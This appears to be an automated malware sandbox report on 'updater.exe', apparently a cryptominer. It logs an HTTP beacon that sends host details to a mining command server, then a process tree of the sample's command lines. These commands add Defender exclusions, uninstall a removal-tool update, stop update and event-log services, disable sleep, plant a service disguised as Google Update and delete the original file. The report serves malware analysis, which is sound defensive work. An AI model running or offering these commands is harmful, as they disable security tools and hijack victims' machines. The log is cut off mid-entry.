                                        Oct 6, 2024 01:48:19.123850107 CEST179OUTPOST /api/endpoint.php HTTP/1.1
                                        Accept: */*
                                        Connection: close
                                        Content-Length: 484
                                        Content-Type: application/json
                                        Host: minerchenzhi888.top
                                        User-Agent: cpp-httplib/0.12.6
                                        Oct 6, 2024 01:48:19.220191956 CEST484OUTData Raw: 7b 22 69 64 22 3a 22 68 6c 68 77 7a 6a 77 72 78 72 65 77 62 62 6c 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 31 30 39 33 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 49 6e 74 65 6c 28
                                        Data Ascii: {"id":"hlhwzjwrxrewbblx","computername":"610930","username":"SYSTEM","gpu":"Intel(R) UHD Graphics 630","cpu":"Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":122,"type"
                                        Oct 6, 2024 01:48:19.635543108 CEST722INHTTP/1.1 521
                                        Date: Sat, 05 Oct 2024 23:48:19 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 15
                                        Connection: close
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F5aR7RV5Yv5rzGodXAqFE4KDYUJFhjqtaEyBJX9zf%2F6DvrcFcGwSGKJiqWeqdzulgFo00Rn6n98wFoGXkV4kZEdifjw3fttpl9aOwUF5y4D5PfcH1md7ux44mm%2F70gK88q6y8P7u"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        X-Frame-Options: SAMEORIGIN
                                        Referrer-Policy: same-origin
                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                        Server: cloudflare
                                        CF-RAY: 8ce14d43de9f8c21-EWR
                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                        Data Ascii: error code: 521


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:19:46:09
                                        Start date:05/10/2024
                                        Path:C:\Users\user\Desktop\updater.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\updater.exe"
                                        Imagebase:0x7ff6568e0000
                                        File size:2'728'960 bytes
                                        MD5 hash:A0C374F31894AA332D158F56608C89C3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:1
                                        Start time:19:46:09
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        Imagebase:0x7ff7f8990000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:19:46:09
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:19:46:11
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff7dfec0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:19:46:11
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:19:46:11
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:19:46:11
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:19:46:11
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\wusa.exe
                                        Wow64 process (32bit):false
                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff752950000
                                        File size:316'416 bytes
                                        MD5 hash:E43499EE2B4CF328A81BACE9B1644C5D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:19:46:11
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:13
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:14
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:15
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:16
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:17
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:18
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:19
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:20
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:21
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:22
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:23
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:24
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:25
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:26
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:27
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:28
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:29
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:30
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:31
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:32
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:33
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\updater.exe"
                                        Imagebase:0x7ff7dfec0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:34
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:35
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:36
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\ProgramData\Google\Chrome\updater.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                        Imagebase:0x7ff758ee0000
                                        File size:2'728'960 bytes
                                        MD5 hash:A0C374F31894AA332D158F56608C89C3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 96%, ReversingLabs
                                        • Detection: 82%, Virustotal, Browse
                                        Has exited:true

                                        General

                                        Target ID:37
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\choice.exe
                                        Wow64 process (32bit):false
                                        Commandline:choice /C Y /N /D Y /T 3
                                        Imagebase:0x7ff748040000
                                        File size:35'840 bytes
                                        MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:38
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        Imagebase:0x7ff7f8990000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:39
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:40
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff7dfec0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:41
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:42
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:43
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:44
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\wusa.exe
                                        Wow64 process (32bit):false
                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff752950000
                                        File size:316'416 bytes
                                        MD5 hash:E43499EE2B4CF328A81BACE9B1644C5D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:45
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:46
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:47
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:48
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:49
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:50
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:51
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:52
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:53
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:54
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:55
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:56
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:57
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
